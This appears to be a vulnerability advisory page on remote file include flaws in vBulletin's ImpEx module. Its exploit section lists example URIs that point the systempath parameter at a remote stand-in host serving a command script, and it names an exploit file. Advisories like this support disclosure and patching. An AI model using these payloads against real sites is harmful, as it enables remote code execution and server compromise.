• info
• discussion
• exploit
• solution
• references

VBulletin ImpEx Multiple Remote File Include Vulnerabilities

Attackers can use a browser to exploit this issue.

The following example URIs demonstrate these issues:
http://www.example.com/forum/impex/ImpExModule.php?systempath=http://www.example2.com/cmd?&=id
http://www.example.com/forum/impex/ImpExController.php?systempath=http://www.example2.com/cmd?&=id
http://www.example.com/forum/impex/ImpExDisplay.php?systempath=http://www.example2.com/cmd?&=id
http://www.example.com/impex/ImpExData.php?systempath=[shell-attack]

The following exploit is available:

• /data/vulnerabilities/exploits/vBulletin-ImpEx-rfi.php